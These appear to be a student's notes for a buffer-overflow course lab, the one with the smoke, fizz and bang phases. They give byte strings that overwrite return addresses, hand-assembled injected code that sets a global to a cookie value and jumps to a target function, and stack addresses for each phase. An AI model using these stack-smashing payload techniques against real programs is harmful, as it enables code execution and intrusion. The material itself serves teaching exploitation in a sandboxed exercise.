cookie:  0x1e46ede3
phase 0:

0001 0001 0002 0002 0003 0004 0004 6094 0408
we need 4 regs filled with crap so that we can change the ret to smoke's initial address

phase 1:

to get to fizz:
0001 0001 0002 0002 0003 0004 0004 f093 0408

then we add one reg of padding to overwrite fizz's ret reg with our cookie:
0001 0001 0002 0002 0003 0004 0004 f093 0408 0000 0000 e3ed 461e

phase 2:

find global_value:
printf "%x",&global_value = 804c0fc

find address of bang:
0x08049380

create exploit code:

00000000 <.text>:
   0:   c7 05 fd c0 04 08 e3    movl   $0x1e46ede3,0x804c0fd
   7:   ed 46 1e
   a:   68 80 93 04 08          push   $0x8049380
   f:   c3                      ret

find ebp-12 so we can return to exploit code:
0xffffafac

final exploit code is:
c705 fdc0 0408 e3ed 461e 6880 9304 08c3 acaf ffff

phase 3:

create our exploit:

00000000 <.text>:
   0:	b8 e3 ed 46 1e       	mov    $0x1e46ede3,%eax #move cookie into eax
   5:	68 4c 95 04 08       	push   $0x804954c #push address after the call of getbuf so that it doesnt call getbuf and overwrite
   a:	c3                   	ret 


To find the address of old ebp to keep it so it is not corrupted:

x/x $ebp:
	0xffffafe8
start of exploit code:
	0xffffafac

final:

b8e3 ed46 1e68 4c95 0408 c390 e8af ffff acaf ffff


   
